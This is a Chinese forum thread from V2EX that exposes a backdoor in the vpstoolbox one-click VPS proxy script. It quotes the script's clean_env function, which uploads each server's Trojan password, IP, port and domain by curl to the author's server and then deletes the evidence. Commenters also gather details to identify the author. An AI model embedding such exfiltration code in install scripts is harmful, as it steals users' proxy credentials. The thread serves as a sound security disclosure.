通过以下 Referral 链接购买 DigitalOcean 主机,你将可以帮助 V2EX 持续发展 DigitalOcean - SSD Cloud Servers
这是一个创建于 984 天前的主题,其中的信息可能已经有所发展或是发生改变。
仓库:https://github.com/johnrosen1/vpstoolbox/blob/master/vps.sh
会把机场的 IP ,端口,密码上传到作者可控的服务器,后续想干嘛就不知道了
https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494
clean_env(){ prasejson cd /root echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null rm ${myip}.txt cd rm -rf /root/*.sh rm -rf /usr/share/nginx/*.sh clear } 第 1 条附言 2023-03-30 12:30:17 +08:00
 | 1 buyan3303 2023-03-30 10:37:12 +08:00 [机场的 IP ,端口,密码上传到作者可控的服务器] 通常自己免费使用这些机场 |
 | 2 proxytoworld OP @buyan3303 也有可能转卖,谁知道呢 |
 | 3 Greenm 2023-03-30 11:02:38 +08:00  1 不管出于什么目的,我已经提交 report 给 github 了。 |
 | 4 vsitebon 2023-03-30 11:19:02 +08:00 太特么溜了 |
 | 5 Andim 2023-03-30 11:37:50 +08:00 via iPhone 还是 1000 以上的关注项目呀 |
 | 6 arfaWong 2023-03-30 11:39:45 +08:00 2 之前就有人发现发了 issue ,然后作者把 issue 给关了  |
 | 7 jomalonejia 2023-03-30 11:47:13 +08:00 关注后续 |
 | 8 csrocks 2023-03-30 11:48:38 +08:00 已经删库了 |
 | 9 aogg 2023-03-30 11:49:06 +08:00 已经打不开 github 项目了 |
 | 10 lzgshsj 2023-03-30 11:49:36 +08:00 4 不开 issue 的的仓库,多少有点这那毛病 |
 | 11 Rache1 2023-03-30 11:53:42 +08:00 |
| 12 Rache1 2023-03-30 11:55:32 +08:00 在这个 issue 发出来的时候,还有 1.6k star 为什么 trojan 订阅地址包括用户密码等要上传到个人博客? Issue #138 johnrosen1/vpstoolbox GitHub https://web.archive.org/web/20221128070511/https://github.com/johnrosen1/vpstoolbox/issues/138 |
| 13 vsitebon 2023-03-30 11:56:00 +08:00 已经删号和删库了 |
 | 14 iyiluo 2023-03-30 11:56:22 +08:00 跑路了,估计好一大波肉鸡 |
 | 15 lakehylia 2023-03-30 11:56:48 +08:00 这是真正的删库跑路吧。。。 |
| 16 vsitebon 2023-03-30 11:59:13 +08:00 12 该开发者在 v 站: member/johnrosen1 |
 | 17 leaflxh 2023-03-30 12:00:49 +08:00 曾经有一次把 get.docker.com 记错了,打成了 get-docker.sh 。用一键脚本感觉像是在裸奔 |
| 18 leaflxh 2023-03-30 12:02:15 +08:00 2 #!/bin/bash while [ 1 ] do echo " ______________ ______ ___ ________ " echo " .\\\\ _ _ /----/ /_____/ \\\\\\. /_ " echo " )__/ /___\\ _/ // / // /___(__ " echo " / // \\ // / // /_\\ \\ " echo " /_____\\ /_____\\ _________\\ _______ \\ " echo " ////////\\_____///////\\\\/////////\\\\///////\\_____//. " echo " _________ ___________ ________ _______ ________ " echo " _) /_.) ._ // ___ // /_____\\____ ( " echo " \\ |__/ \\__ |/ _// / / / X0 / \\ " echo " \\ : / / \\__ / //_ /\\ /. / \\ " echo " .\\\\___ /___\\ /_____////____/\\ \\\\__ / " echo " ////\\____//////\\____/////// ////////\\____////\\____//. " echo " ///// ///// ///// ///// " echo "" echo " WHY YOU NO LOOK AT THE SOURCE BEFORE YOU PIPE INTO BASH??" echo "" echo " #AirGap2020 Virtual Conference May 2nd! https://airgapp.in" echo " Follow @airgappin on Twitter for updates!" echo "" done |
 | 19 magiccode PRO 看了一眼,开发这个的老哥在 v2 也宣传过 |
 | 21 iijboom 2023-03-30 12:20:23 +08:00 https://github.com/laoz77/trojan-gfw-script 这个应该是他的大号 打开可以看到他的网址,建议大家一起一锅端举报了 trojan-gfw-script This script will help you set up a trojan-gfw server in an extremely fast way. https://www.johnrosen1.com/trojan/ main course Auto install and setup Trojan-Gfw and nginx. Auto enable tcp-bbr and disable tcp slow start |
| 22 proxytoworld OP @vsitebon #16 牛逼,这样的开发能封了吗,这脚本还是 root 权限 |
| 23 proxytoworld OP |
| 24 proxytoworld OP 博客也暂时关了 |
 | 25 Death 2023-03-30 12:26:39 +08:00 2 一键脚本应该尽量默认是有问题的 哪怕是官方提供的安装脚本也要自己过一遍才能放心 |
| 26 iijboom 2023-03-30 12:27:32 +08:00 https://github.com/johnwick3gits/trojan-gfw-script 小号加 1 This branch is 1211 commits ahead of laoz77:master. 下面也有他的信息 Telegram Channel And Group https://t.me/johnrosen1 https://t.me/trojanscript 中文文 |
 | 27 FranzKafka95 2023-03-30 12:29:54 +08:00 via Android 1 不开 ISSUE 区其实已经很能说明问题了。 |
 | 30 404www 2023-03-30 12:33:04 +08:00 哈哈,连博客也删解析了 |
| 31 proxytoworld OP @LeegoYih #28 有可能是抓下来在卖,如果自己用,这样大批量的也用不着 |
 | 32 buydip 2023-03-30 12:50:21 +08:00 把这祸害弄进去 |
 | 33 mns 2023-03-30 12:50:36 +08:00 啊这,以前好像还有群的。 |
 | 34 tf2 2023-03-30 13:38:55 +08:00 1 一来可以自己卖赚钱 二来可以怼人举报一波,把线索卖个晶哥简单立个功 |
 | 35 XSNARUTO 2023-03-30 13:54:11 +08:00 3 从来不推荐任何小白用什么一件脚本,反正现在便宜机场一大堆,我甚至会觉得随便给小白丢什么「一键脚本」的人都不是什么太负责的人。真的有需求的人,要么会自己搭(毕竟也不难),要么多少懂一点起码的 review 脚本代码。 想起来之前逛 Twitter 看到有小白(而且说了自己不是数码 /科技爱好者)询问数据存储意见,很简单的就买现成云存储的需求,结果也是有人上来就让人家去买 NAS 。我真的无大语,总有人喜欢放个屁,然后跑得无影无踪……。 |
 | 36 rock123 2023-03-30 14:23:48 +08:00 |
| 37 Greenm 2023-03-30 14:35:40 +08:00 1 https://t.me/vpstoolbox/2 他尝到了甜头,重新搞了个小号打复活赛了 |
| 38 Greenm 2023-03-30 14:52:36 +08:00 https://github.com/ghost 这个账号应该才是他的大号,隐藏了 activity |
 | 39 jenlors 2023-03-30 14:56:20 +08:00 1 这种人就是败类 |
| 40 proxytoworld OP @Greenm 咋查到大号的,牛啊 |
 | 41 AkaGhost 2023-03-30 15:00:13 +08:00 via Android 1 ghost 是个特殊用户,代表那个用户已经注销了 |
 | 43 joesonw 2023-03-30 16:02:36 +08:00 via iPhone 域名用了 privacy guardian ,一起去举报 abuse 披露注册信息,不知有没有用。 |
 | 45 czn1fgmfdngp22 2023-03-30 16:50:00 +08:00 2 《你用我脚本,我用你代理》 |
 | 46 Jeanslike 2023-03-30 16:59:56 +08:00 确实是个败类 |
 | 48 BigShot404 2023-03-30 17:17:04 +08:00 说到这个,现在用 OPENAI ,扫一遍代码然后标注一些疑似账号泄露或者后门地址应该不难吧? |
 | 49 20160409 2023-03-30 17:18:49 +08:00 |
 | 50 0x535 2023-03-30 17:40:32 +08:00 3 580 个 fork 都没发现这个问题 fork 了个寂寞 |
 | 51 DeltaC 2023-03-30 17:50:48 +08:00 致富门路+1 |
 | 52 HaneRo 2023-03-30 18:06:37 +08:00 via Android rm -rf /root/*.sh ?删除 root 下所有 sh 文件?这是不是不太好 |
 | 53 FightPig 2023-03-30 19:32:57 +08:00 删的动作挺快 |
 | 54 oszlso 2023-03-30 21:43:51 +08:00 1 作者 @johnrosen1 今日活跃度排名 9187 ,上线咋不吱声呀 |
 | 55 boris1993Jr 2023-03-31 00:35:09 +08:00 via iPhone @0x535 #50 我感觉大部分人都是拿 fork 当收藏用的,因为小白喜欢这么玩,而用一键脚本的又有不少小白 |
 | 56 FrankAdler 2023-03-31 00:42:33 +08:00 1 https://github.com/Doutianbao/vpstoolbox 相关的 fork 还能找到 |
 | 57 n18255447846 2023-03-31 03:22:10 +08:00 2 事实证明就算有大量使用的人甚至官方的脚本 or 程序,还是有一定的风险。就看懂行的有没有人爆出来了 |
 | 58 ttyhtg 2023-03-31 07:26:26 +08:00 1 能不能把他扒个底朝天,把他送进去? |
 | 59 levelworm 2023-03-31 08:20:44 +08:00 看了下文中的语气,感觉不太像是大陆人?但是的确又是简体字。 比如这个:操作系统不支援,请使用 Debian 或者 Ubuntu 运行。 像我这种 shell 小白真是大开眼界啊,能学不少东西,希望大家能抓到这个人。 |
 | 60 CodeCodeStudy 2023-03-31 09:43:09 +08:00 @levelworm 应该是湾湾用简体字,然后搞肉鸡 |
| 62 proxytoworld OP @levelworm #59 合理了 |
 | 64 woyao 2023-03-31 09:53:15 +08:00 有使用过这些 docker 的人也小心一点吧 https://hub.docker[.]com/r/johnrosen/nzbget/tags |
 | 65 Vindroid 2023-03-31 10:04:11 +08:00 1 灯下黑,很多人一看是开源的,还那么多星星,那就不看源码,一把梭哈。一键脚本我是从来不敢直接用的 |
 | 66 AlphaTauriHonda 2023-03-31 10:04:52 +08:00 via iPhone 实在是离谱。 是难以封光代理所以主动发布间谍项目? 还是 johnrosen1 想倒卖代理获利? |
 | 67 jklove123bai 2023-03-31 10:13:37 +08:00 所以那些相信开源没事的人的逻辑,我很难理解 |
| 69 woyao 2023-03-31 11:14:04 +08:00 @CodeCodeStudy 应该不是湾湾 他的域名 jiesen[.]life 和 johnrosen1[.]com ,看了一下解析 IP ,有不少上海电信的 IP 。应该是在上海。 |
 | 70 ICU 2023-03-31 11:18:46 +08:00 哈哈 楼主这个发现,还上了这里的新闻( https://www.oschina.net/news/234764 ) |
| 71 woyao 2023-03-31 11:21:03 +08:00 不是湾湾的证据还可以看这篇文章 Ledger Nano X 开箱记录及上手体验 https://johnrosen1[.]com/2021/06/02/ledger/ |
 | 72 leeuu 2023-03-31 12:56:26 +08:00 via iPhone 开盒了 |
 | 73 Shura 2023-03-31 15:40:35 +08:00 真是败类,没有人品 |
| 74 levelworm 2023-03-31 16:33:19 +08:00 via Android @lxiian 看 69 楼,也不好确定了。另外注释里其他的中文看起来又比较像大陆这边的,不知道坛贤们能不能挖出来更多的。 |
| 75 levelworm 2023-03-31 16:51:19 +08:00 via Android |
 | 76 lovedebug 2023-03-31 16:57:33 +08:00 繁体字“支援”默认不会翻译成“支持” |
 | 77 mypchas6fans 2023-03-31 17:12:08 +08:00 @20160409 之前说有挖矿传言,但我一直在用,只能说看上去没问题,vps cpu 内存流量都正常 |
 | 78 Jakarta 2023-03-31 20:03:41 +08:00 via Android 我感觉像是居住在大陆的台湾人。 |
| 79 Jakarta 2023-03-31 20:17:08 +08:00 via Android johnrosen.xyz 也是他的,还搭建了邮件服务器,邮箱是 john 艾特 johnrosen.xyz |
 | 80 kebamt 2023-03-31 23:19:07 +08:00 via iPhone @mypchas6fans 没出现过问题,都正常,只是脚本会自动给你做决定服务器层面屏蔽掉一些网站,如:大纪元 |
 | 81 mcone 2023-04-01 21:07:40 +08:00 前两天看到帖子,这两天无聊搜下了,跟楼上某位朋友的结论有点像,应该是个肉身在大陆的台湾人或者被港台语法深刻浸染过的大陆人。 |
 | 82 love2wind 2023-04-02 18:23:38 +08:00 慎用一键脚本啊,谁知道有没有夹带私货 |
 | 83 luoshengdu 2023-04-02 22:32:17 +08:00 我擦,我用了好多年了啊 |
 | 84 mypchas6fans 2023-04-03 08:49:19 +08:00 @kebamt 嗯,这个看生成的 config.json 就知道,有必要。 |
 | 85 zlhsvc 2023-04-03 10:44:58 +08:00 还真没有去翻一键脚本的习惯,下次看来得多注意了 |
Select Language